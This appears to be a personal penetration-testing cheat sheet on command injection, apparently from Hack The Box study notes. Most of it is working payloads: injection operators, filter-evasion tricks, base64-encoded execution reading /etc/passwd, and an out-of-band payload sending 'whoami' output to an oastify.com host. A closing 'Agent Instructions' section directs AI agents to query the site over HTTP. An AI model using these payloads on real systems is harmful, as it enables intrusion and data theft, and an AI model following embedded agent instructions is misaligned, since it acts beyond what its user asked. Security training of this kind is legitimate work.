# Command Injection

| **Injection Operator** | **Injection Character** | **URL-Encoded Character** | **Executed Command**                       |
| ---------------------- | ----------------------- | ------------------------- | ------------------------------------------ |
| Semicolon              | `;`                     | `%3b`                     | Both                                       |
| New Line               | `\`                     | `%0a`                     | Both                                       |
| Background             | `&`                     | `%26`                     | Both (second output generally shown first) |
| Pipe                   | \`                      | <<<\`                     | `%7c`                                      |
| AND                    | `&&`                    | `%26%26`                  | Both (only if first succeeds)              |
| OR                     | \`                      |                           | \`                                         |
| Sub-Shell              | \`\`\`\`                | `%60%60`                  | Both (Linux-only)                          |
| Sub-Shell              | `$()`                   | `%24%28%29`               | Both (Linux-only)                          |
| tabulador              | `\`                     | `%09`                     | Linux-only                                 |
| space                  | \`\`                    | `${IFS}`                  | Linux-only                                 |

{% hint style="info" %}
If the error message displayed a different page, with information like our IP and our request, this may indicate that it was denied by a WAF
{% endhint %}

## Environment Variables

| Linux      | `${IFS}`            | Commonly use to evade space |
| ---------- | ------------------- | --------------------------- |
| Linux      | `${PATH:0:1}`       | `/`                         |
| Linux      | `${LS_COLORS:10:1}` | `;`                         |
| Windows    | `%HOMEPATH:~6,-11%` | `/`                         |
| PowerShell | `$env:HOMEPATH[0]`  | `/`                         |

## **Bypassing Blacklisted Commands**

```bash
#Linux
Intrusionz3r0@htb[/htb]$ w'h'o'am'i21y4d
Intrusionz3r0@htb[/htb]$ w"h"o"am"i
Intrusionz3r0@htb[/htb]$ who$@ami
Intrusionz3r0@htb[/htb]$ w\\ho\\am\\i
Intrusionz3r0@htb[/htb]$ {cat,/etc/passwd}

#Windows
C:\\htb> who^ami
```

## Case manipulation

{% hint style="info" %}
Linux is case-sensitive hance we have to get a bit creative and find a command that turns the command into an all-lowercase word.
{% endhint %}

```bash
#Windows
PS C:\\htb> WhOaMi
#Linux
Intrusionz3r0@htb[/htb]$ $(tr "[A-Z]" "[a-z]"<<<"cAt") /etc/passwd
Intrusionz3r0@htb[/htb]$ $(a="printENv";printf %s "${a,,}")

#Example
$(tr%09"[A-Z]"%09"[a-z]"<<<"cAt")${IFS}${PATH:0:1}etc${PATH:0:1}passwd
```

## Reversing commands

```bash
#Get the word in reverse
Intrusionz3r0@htb[/htb]$ echo 'whoami' | rev
PS C:\\htb> "whoami"[-1..-20] -join ''
Output: imaohw

#Execute command
Intrusionz3r0@htb[/htb]$ $(rev<<<'imaohw')
PS C:\\htb> iex "$('imaohw'[-1..-20] -join '')"
Output: Intrusionz3r0

```

## Encode Commands

```bash
Intrusionz3r0@htb[/htb]$ echo -n 'cat /etc/passwd | grep 33' | base64
output: Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw=

Intrusionz3r0@htb[/htb]$ bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
output: www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

Intrusionz3r0@htb[/htb]$ echo -n whoami | iconv -f utf-8 -t utf-16le | base64
PS C:\\htb> [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))
Output: dwBoAG8AYQBtAGkA

PS C:\\htb> iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
```

## Blind OS command injection with out-of-band data exfiltration

```sh
& nslookup `whoami`929y6u9dkdbxdod9zzkjvxf7vy1pplda.oastify.com #
```

## Miscelaneous commands

| **Injection Type**                      | **Operators**                                     |
| --------------------------------------- | ------------------------------------------------- |
| SQL Injection                           | `'` `,` `;` `--` `/* */`                          |
| Command Injection                       | `;` `&&`                                          |
| LDAP Injection                          | `*` `(` `)` `&` \`                                |
| XPath Injection                         | `'` `or` `and` `not` `substring` `concat` `count` |
| OS Command Injection                    | `;` `&` \`                                        |
| Code Injection                          | `'` `;` `--` `/* */` `$()` `${}` `#{}` `%{}` `^`  |
| Directory Traversal/File Path Traversal | `../` `..\\\\` `%00`                              |
| Object Injection                        | `;` `&` \`                                        |
| XQuery Injection                        | `'` `;` `--` `/* */`                              |
| Shellcode Injection                     | `\\x` `\\u` `%u` `%n`                             |
| Header Injection                        | `\` `\\r\` `\` `%0d` `%0a` `%09`                  |

## Tools

<https://github.com/Bashfuscator/Bashfuscator>

<https://github.com/danielbohannon/Invoke-DOSfuscation>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://intrusionz3r0.gitbook.io/intrusionz3r0/hacking-web/vulnerabilities/command-injection.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.